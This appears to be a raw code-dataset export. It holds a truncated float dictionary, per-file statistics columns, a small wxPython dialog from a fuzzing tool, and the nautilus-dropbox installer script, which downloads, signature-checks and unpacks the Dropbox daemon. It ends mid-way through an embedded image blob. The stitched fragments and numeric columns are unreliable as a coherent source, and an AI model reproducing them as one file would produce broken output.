0.90625, 0.09375], 0.874755859375: [0.484375, 0.515625], 0.341552734375: [0.453125, 0.546875], 0.132568359375: [0.265625, 0.734375], 0.851318359375: [0.734375, 0.265625], 0.943115234375: [0.796875, 0.203125], 0.7490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.632568359375: [0.734375, 0.265625], 0.59375: [0.5, 0.75, 0.0, 0.25], 0.409912109375: [0.890625, 0.109375], 0.37109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.700927734375: [0.953125, 0.046875], 0.073974609375: [0.359375, 0.640625], 0.421630859375: [0.984375, 0.015625], 0.142333984375: [0.828125, 0.171875], 0.050537109375: [0.390625, 0.609375], 0.288818359375: [0.265625, 0.734375], 0.25: [0.5, 0.75, 0.0, 0.25], 0.611083984375: [0.828125, 0.171875], 0.478271484375: [0.921875, 0.078125], 0.200927734375: [0.953125, 0.046875], 0.540771484375: [0.921875, 0.078125], 0.8125: [0.5, 0.75, 0.0, 0.25], 0.906005859375: [0.484375, 0.515625], 0.357177734375: [0.953125, 0.046875], 0.400146484375: [0.421875, 0.578125]}
| 18,661.4
| 30,928
| 0.721296
| 15,378
| 93,307
| 4.376187
| 0.048186
| 0.004101
| 0.003076
| 0.004755
| 0.99471
| 0.992407
| 0.992407
| 0.990787
| 0.990787
| 0.990787
| 0
| 0.785317
| 0.082341
| 93,307
| 5
| 30,929
| 18,661.4
| 0.000642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
90c4f2755b1867d25aa9ddb2770459b7bd8bac59
| 608
|
py
|
Python
|
FuzzingTool_Dialog_FuzzAlreadyMinimized_Child.py
|
Ryu-Miyaki/Fuzz4B
|
8546f165d4dbdd97eb6ab5a6f4c445ee81ec364b
|
[
"MIT"
] | 16
|
2020-06-25T11:56:59.000Z
|
2022-02-05T14:00:12.000Z
|
FuzzingTool_Dialog_FuzzAlreadyMinimized_Child.py
|
Ryu-Miyaki/Fuzz4B
|
8546f165d4dbdd97eb6ab5a6f4c445ee81ec364b
|
[
"MIT"
] | null | null | null |
FuzzingTool_Dialog_FuzzAlreadyMinimized_Child.py
|
Ryu-Miyaki/Fuzz4B
|
8546f165d4dbdd97eb6ab5a6f4c445ee81ec364b
|
[
"MIT"
] | null | null | null |
"""Subclass of Dialog_FuzzAlreadyMinimized, which is generated by wxFormBuilder."""
import wx
import FuzzingTool
from FuzzingTool_Dialog_FuzzAlreadyMinimized import FuzzingTool_Dialog_FuzzAlreadyMinimized
# Implementing Dialog_FuzzAlreadyMinimized
class FuzzingTool_Dialog_FuzzAlreadyMinimized_Child( FuzzingTool_Dialog_FuzzAlreadyMinimized ):
    """wxFormBuilder-generated dialog subclass shown when the fuzz target is already minimized."""

    def __init__( self, parent ):
        # NOTE(review): initializes via FuzzingTool.Dialog_FuzzAlreadyMinimized rather
        # than the FuzzingTool_Dialog_FuzzAlreadyMinimized base imported above —
        # presumably the same generated class re-exported by the FuzzingTool module;
        # confirm the two refer to the same class.
        FuzzingTool.Dialog_FuzzAlreadyMinimized.__init__( self, parent )

    # Handlers for Dialog_FuzzAlreadyMinimized events.
    def Button_OKOnButtonClick( self, event ):
        # TODO: Implement Button_OKOnButtonClick
        # Closes the modal dialog; True (== 1) becomes ShowModal()'s return code.
        self.EndModal(True)
| 33.777778
| 95
| 0.847039
| 59
| 608
| 8.338983
| 0.508475
| 0.422764
| 0.376016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100329
| 608
| 17
| 96
| 35.764706
| 0.899452
| 0.340461
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 1
| 0.25
| false
| 0
| 0.375
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90ca01bf177f568017614f2abec701ea01e14534
| 119,684
|
py
|
Python
|
dropbox.py
|
rgdcastro/docker-dropbox
|
69588b22282e4917ea29b8b1033bdcd7d686eab0
|
[
"MIT"
] | 5
|
2017-04-26T20:34:06.000Z
|
2022-01-20T14:42:34.000Z
|
rbin/dropbox.py
|
ryanmjacobs/rd
|
59b950a20a04eb406b78a14be9461fece1bc6882
|
[
"MIT"
] | null | null | null |
rbin/dropbox.py
|
ryanmjacobs/rd
|
59b950a20a04eb406b78a14be9461fece1bc6882
|
[
"MIT"
] | 1
|
2021-04-20T13:37:10.000Z
|
2021-04-20T13:37:10.000Z
|
#!/usr/bin/env python3
#
# Copyright (c) Dropbox, Inc.
#
# dropbox
# Dropbox frontend script
# This file is part of nautilus-dropbox 2020.03.04.
#
# nautilus-dropbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nautilus-dropbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nautilus-dropbox. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import with_statement
import errno
import locale
import optparse
import os
import platform
import shutil
import socket
import subprocess
import sys
import tarfile
import tempfile
import threading
import _thread
import time
import traceback
import urllib.request
try:
import gpg
gpgme = None
except ImportError:
gpg = None
# Still support gpgme for now. Remove this once we only support 17.04+.
try:
import gpgme
except ImportError:
gpgme = None
from contextlib import closing, contextmanager
from io import BytesIO
from operator import methodcaller
from os.path import relpath
from posixpath import curdir, sep, pardir, join, abspath, commonprefix
INFO = "Dropbox is the easiest way to share and store your files online. Want to learn more? Head to"
LINK = "https://www.dropbox.com/"
WARNING = "In order to use Dropbox, you must download the proprietary daemon."
GPG_WARNING = "Note: python3-gpg (python3-gpgme for Ubuntu 16.10 and lower) is not installed, we will not be able to verify binary signatures."
ERROR_CONNECTING = "Trouble connecting to Dropbox servers. Maybe your internet connection is down, or you need to set your http_proxy environment variable."
ERROR_SIGNATURE = "Downloaded binary does not match Dropbox signature, aborting install."
ERROR_INVALID_DROPBOX = "Could not start the Dropbox daemon. Make sure your computer meets the minimum requirements:\nhttps://www.dropbox.com/help/desktop-web/system-requirements#desktop"
DOWNLOAD_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s"
SIGNATURE_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s&signature=1"
DOWNLOADING = "Downloading Dropbox... %d%%"
UNPACKING = "Unpacking Dropbox... %d%%"
PARENT_DIR = os.path.expanduser("~")
DROPBOX_DIST_PATH = "%s/.dropbox-dist" % PARENT_DIR
DROPBOXD_PATH = os.path.join(DROPBOX_DIST_PATH, "dropboxd")
DESKTOP_FILE = "/usr/share/applications/dropbox.desktop"
enc = locale.getpreferredencoding()
# Available from https://linux.dropbox.com/fedora/rpm-public-key.asc
DROPBOX_PUBLIC_KEY = b"""
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.0
mQENBEt0ibEBCACv4hZRPqwtpU6z8+BB5YZU1a3yjEvg2W68+a6hEwxtCa2U++4dzQ+7EqaU
q5ybQnwtbDdpFpsOi9x31J+PCpufPUfIG694/0rlEpmzl2GWzY8NqfdBFGGm/SPSSwvKbeNc
FMRLu5neo7W9kwvfMbGjHmvUbzBUVpCVKD0OEEf1q/Ii0Qcekx9CMoLvWq7ZwNHEbNnij7ec
nvwNlE2MxNsOSJj+hwZGK+tM19kuYGSKw4b5mR8IyThlgiSLIfpSBh1n2KX+TDdk9GR+57TY
vlRu6nTPu98P05IlrrCP+KF0hYZYOaMvQs9Rmc09tc/eoQlN0kkaBWw9Rv/dvLVc0aUXABEB
AAG0MURyb3Bib3ggQXV0b21hdGljIFNpZ25pbmcgS2V5IDxsaW51eEBkcm9wYm94LmNvbT6J
ATYEEwECACAFAkt0ibECGwMGCwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRD8kYszUESRLi/z
B/wMscEa15rS+0mIpsORknD7kawKwyda+LHdtZc0hD/73QGFINR2P23UTol/R4nyAFEuYNsF
0C4IAD6y4pL49eZ72IktPrr4H27Q9eXhNZfJhD7BvQMBx75L0F5gSQwuC7GdYNlwSlCD0AAh
Qbi70VBwzeIgITBkMQcJIhLvllYo/AKD7Gv9huy4RLaIoSeofp+2Q0zUHNPl/7zymOqu+5Ox
e1ltuJT/kd/8hU+N5WNxJTSaOK0sF1/wWFM6rWd6XQUP03VyNosAevX5tBo++iD1WY2/lFVU
JkvAvge2WFk3c6tAwZT/tKxspFy4M/tNbDKeyvr685XKJw9ei6GcOGHD
=5rWG
-----END PGP PUBLIC KEY BLOCK-----
"""
def console_print(st="", f=sys.stdout, linebreak=True):
    """Write *st* to *f*, appending the platform line separator unless *linebreak* is False."""
    text = st + os.linesep if linebreak else st
    f.write(text)
def console_flush(f=sys.stdout):
    """Flush *f* (stdout by default) so prompt text appears immediately."""
    f.flush()
def yes_no_question(question):
    """Prompt the user with *question* until they answer yes or no.

    Returns True for an answer starting with "y", False for one starting
    with "n"; anything else re-prompts.
    """
    while True:
        console_print(question, linebreak=False)
        console_print(" [y/n] ", linebreak=False)
        console_flush()
        answer = input().lower()
        if answer.startswith("y"):
            return True
        if answer.startswith("n"):
            return False
        console_print("Sorry, I didn't understand that. Please type yes or no.")
def plat():
    """Return the Dropbox download platform tag for this machine.

    "lnx.x86" for 32-bit i?86 Linux, "lnx.x86_64" for 64-bit Linux;
    any other platform reports a fatal error via FatalVisibleError.
    """
    if sys.platform.lower().startswith('linux'):
        arch = platform.machine()
        if arch == 'x86_64':
            tag = arch
        elif arch[0] == 'i' and arch[1].isdigit() and arch[2:4] == '86':
            tag = "x86"
        else:
            FatalVisibleError("Platform not supported")
        return "lnx.%s" % tag
    FatalVisibleError("Platform not supported")
def is_dropbox_running(pidfile=None):
    """Return True if the process recorded in the Dropbox pid file is
    alive and its command line mentions "dropbox".

    pidfile -- path of the pid file to inspect; defaults to
               ~/.dropbox/dropbox.pid (parameter added for testability,
               default behavior unchanged).

    Any failure -- missing or non-numeric pid file, dead process,
    unreadable /proc entry -- is treated as "not running".  The
    original bare ``except:`` also swallowed KeyboardInterrupt and
    SystemExit; this catches only the expected errors.
    """
    if pidfile is None:
        pidfile = os.path.expanduser("~/.dropbox/dropbox.pid")
    cmdline = ""
    try:
        with open(pidfile, "r") as f:
            pid = int(f.read())
        with open("/proc/%d/cmdline" % pid, "r") as f:
            cmdline = f.read().lower()
    except (OSError, ValueError):
        # OSError: file missing/unreadable; ValueError: pid file does
        # not contain an integer.  Either way Dropbox is not running.
        pass
    return "dropbox" in cmdline
@contextmanager
def gpg_context(keys):
    """Yield a PGP context (the ``gpg`` binding if available, else
    ``gpgme``) with the given keys imported and set as signers.

    keys -- iterable of binary file-like objects containing armored
            public keys.

    A throwaway GNUPGHOME directory is created for the lifetime of the
    context and removed on exit.  Fixes vs. the previous version: the
    gpg.conf handle is closed even on error, and a pre-existing
    GNUPGHOME environment value is restored instead of being deleted.
    """
    _gpghome = tempfile.mkdtemp(prefix='tmp.gpghome')
    prev_gpghome = os.environ.get('GNUPGHOME')
    try:
        os.environ['GNUPGHOME'] = _gpghome
        # An empty per-home gpg.conf keeps user configuration from
        # interfering with verification.
        with open(os.path.join(_gpghome, 'gpg.conf'), 'wb') as fp:
            fp.write(b'')
        if gpg:
            ctx = gpg.Context()
        else:
            ctx = gpgme.Context()
        loaded = []
        for key_file in keys:
            if gpg:
                ctx.op_import(key_file.read())
                result = ctx.op_import_result()
                key = ctx.get_key(result.imports[0].fpr)
            else:
                result = ctx.import_(key_file)
                key = ctx.get_key(result.imports[0][0])
            loaded.append(key)
        ctx.signers = loaded
        yield ctx
    finally:
        # Restore the caller's environment rather than clobbering it.
        if prev_gpghome is None:
            os.environ.pop('GNUPGHOME', None)
        else:
            os.environ['GNUPGHOME'] = prev_gpghome
        shutil.rmtree(_gpghome, ignore_errors=True)
class SignatureVerifyError(Exception):
    """Raised when the downloaded tarball fails PGP signature verification."""
def verify_signature(key_file, sig_file, plain_file):
    """Return True if *sig_file* is a valid detached signature of
    *plain_file* under the key(s) in *key_file*.

    All three arguments are binary file-like objects.  Works with
    whichever of the ``gpg`` / ``gpgme`` bindings this file imported.
    """
    with gpg_context([key_file]) as ctx:
        if gpg:
            ctx.op_verify(sig_file.read(), plain_file.read(), None)
            result = ctx.op_verify_result()
            return result.signatures[0].status == 0
        # gpgme path: a signature status of None means success.
        sigs = ctx.verify(sig_file, plain_file, None)
        return sigs[0].status is None
def download_file_chunk(url, buf):
    """Generator that downloads *url* into the writable buffer *buf*.

    Yields (fraction_complete, keep_reading) tuples so the caller can
    drive a progress display; keep_reading is False only when a
    non-blocking read would block (EAGAIN).

    Raises OSError if the connection closes before 'content-length'
    bytes arrive (previously this case looped forever reading b'').
    """
    opener = urllib.request.build_opener()
    opener.addheaders = [('User-Agent', "DropboxLinuxDownloader/2020.03.04")]
    with closing(opener.open(url)) as f:
        size = int(f.info()['content-length'])
        # Aim for ~200 progress updates, but read at least 4 KiB at a time.
        bufsize = int(max(size / 200, 4096))
        progress = 0
        yield (0, True)
        while True:
            try:
                chunk = f.read(bufsize)
            except OSError as e:
                if getattr(e, 'errno', None) == errno.EAGAIN:
                    # Nothing buffered right now; report progress and retry.
                    yield (float(progress) / size, False)
                    continue
                raise
            if not chunk and progress < size:
                raise OSError(
                    "connection closed after %d of %d bytes" % (progress, size))
            progress += len(chunk)
            buf.write(chunk)
            yield (float(progress) / size, True)
            if progress == size:
                break
class DownloadState(object):
    """Tracks the in-memory download, signature verification, and
    unpacking of the Dropbox distribution tarball."""

    def __init__(self):
        # The whole tarball is buffered in memory before unpacking.
        self.local_file = BytesIO()

    def copy_data(self):
        """Return a generator streaming the platform tarball into
        self.local_file (see download_file_chunk for yield protocol)."""
        return download_file_chunk(DOWNLOAD_LOCATION_FMT % plat(), self.local_file)

    def unpack(self):
        """Verify the detached signature (when a gpg binding is
        available) and extract the tarball under PARENT_DIR.

        Yields (member_name, index, total_members) for progress display.
        Raises SignatureVerifyError if the signature does not check out.
        """
        # Download the detached signature for the same platform tarball.
        signature = BytesIO()
        for _ in download_file_chunk(SIGNATURE_LOCATION_FMT % plat(), signature):
            pass
        signature.seek(0)
        self.local_file.seek(0)
        if gpg or gpgme:
            if not verify_signature(BytesIO(DROPBOX_PUBLIC_KEY), signature, self.local_file):
                raise SignatureVerifyError()
        self.local_file.seek(0)
        archive = tarfile.open(fileobj=self.local_file, mode='r:gz')
        try:
            # Previously getmembers() was called twice; scan once.
            members = archive.getmembers()
            total_members = len(members)
            for i, member in enumerate(members):
                filename = os.path.join(PARENT_DIR, member.name)
                # Replace stale regular files in place; leave directories alone.
                if os.path.exists(filename) and not os.path.isdir(filename):
                    os.unlink(filename)
                archive.extract(member, PARENT_DIR)
                yield member.name, i, total_members
        finally:
            # Close even if the caller abandons the generator mid-way.
            archive.close()

    def cancel(self):
        """Release the in-memory download buffer (idempotent)."""
        if not self.local_file.closed:
            self.local_file.close()

    def is_dropbox_valid(self):
        """
        Validate that Dropbox runs, so we can show an error
        message to the user if it doesn't work.
        Returns True if Dropbox can run, false otherwise.
        """
        # Discard dropboxd's stdout; the previous version leaked this
        # file handle by never closing it.
        with open(os.devnull, "w") as devnull:
            try:
                proc = subprocess.Popen(
                    [DROPBOXD_PATH, "/testrun", "0"],
                    preexec_fn=os.setsid,
                    cwd=os.path.expanduser("~"),
                    stderr=sys.stderr, stdout=devnull, close_fds=True)
            except Exception as e:
                print(e)
                return False
        # Poll every half second, for up to 30 seconds total.
        interval = 0.5
        wait_for = 30
        for _ in range(int(wait_for / interval)):
            ret_val = proc.poll()
            if ret_val is None:
                time.sleep(interval)
                continue
            return ret_val == 0
        return False
def load_serialized_images():
global box_logo_pixbuf, window_icon
import gi
gi.require_version('GdkPixbuf', '2.0')
from gi.repository import GdkPixbuf
box_logo_pixbuf = GdkPixbuf.Pixbuf.new_from_data(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xff\x1b\x00c\xff\xad\x00c\xff\xb1\x00j\xff\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\xff\x1d\x00c\xff\xb0\x00c\xff\xaf\x00d\xff\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xff\x02\x00d\xffn\x00c\xff\xf2\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf3\x00c\xffq\x00\xaa\xff\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xff\x03\x00d\xffp\x00c\xff\xf3\x00b\xff\xff\x00b\xff\xff\x00c\xff\xf2\x00c\xffo\x00\xaa\xff\x03\x00\x00\x00\x00\x00\
